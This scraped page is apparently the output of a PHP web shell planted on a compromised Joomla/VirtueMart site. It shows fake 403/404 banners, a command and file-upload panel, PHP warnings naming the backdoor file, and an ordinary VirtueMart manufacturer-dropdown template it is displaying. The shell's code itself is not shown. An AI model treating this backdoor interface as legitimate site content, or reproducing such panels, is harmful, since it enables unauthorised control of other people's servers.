403 Forbidden


Warning: Undefined array key "execmd" in /home/grupmartgn/elanartcrafts/administrator/components/com_contenthistory/helpers/index.php on line 2


Warning: Undefined variable $liatds in /home/grupmartgn/elanartcrafts/administrator/components/com_contenthistory/helpers/index.php on line 2
Disable Functions:
Path : /home/grupmartgn/elanartcrafts/components/com_virtuemart/sublayouts/
File Upload :
Command :
Current File : /home/grupmartgn/elanartcrafts/components/com_virtuemart/sublayouts/bs3-orderbymanu.php

<?php

$manufacturers = $viewData['manufacturers'];
$fieldLink = $viewData['fieldLink'];
$orderbyTxt = $viewData['orderbyTxt'];
$orderDirLink = $viewData['orderDirLink'];

$manufacturerTxt = '';
$manufacturerLink = '';

$virtuemart_manufacturer_id = vRequest::getInt ('virtuemart_manufacturer_id', 0);

if (count ($manufacturers) > 1) { ?>
<select id="manulist" onchange="window.location.href=this.value">

	<?php if (!empty($virtuemart_manufacturer_id)) {
		$manufacturerTxt = '&virtuemart_manufacturer_id=' . $virtuemart_manufacturer_id;
	}

	if ($virtuemart_manufacturer_id > 0) {
		$allLink = str_replace($manufacturerTxt,$fieldLink,'');
		$allLink .= '&virtuemart_manufacturer_id=0';
		echo '<option value="' . JRoute::_ ($allLink . $orderbyTxt . $orderDirLink , FALSE) . '">' . vmText::_ ('COM_VIRTUEMART_SEARCH_SELECT_ALL_MANUFACTURER') . '</option>';
	} else {
		echo '<option selected>' . vmText::_ ('COM_VIRTUEMART_SEARCH_SELECT_MANUFACTURER') . '</option>';
	}

	foreach ($manufacturers as $mf) {
		$l = str_replace($manufacturerTxt,'',$fieldLink) . '&virtuemart_manufacturer_id=' . $mf->virtuemart_manufacturer_id . $orderbyTxt . $orderDirLink;
		$link = JRoute::_ ($l,FALSE);
		if ($mf->virtuemart_manufacturer_id != $virtuemart_manufacturer_id) {
			echo '<option value="' . str_replace('&tmpl=component','',$link) . '">' . $mf->mf_name . '</option>';
		}
		else {
			echo '<option selected>' . $mf->mf_name . '</option>';
		}
	} ?>

</select>
<?php } ?>

404 Not Found
[ LogOut ]

Warning: Undefined array key "go" in /home/grupmartgn/elanartcrafts/administrator/components/com_contenthistory/helpers/index.php on line 2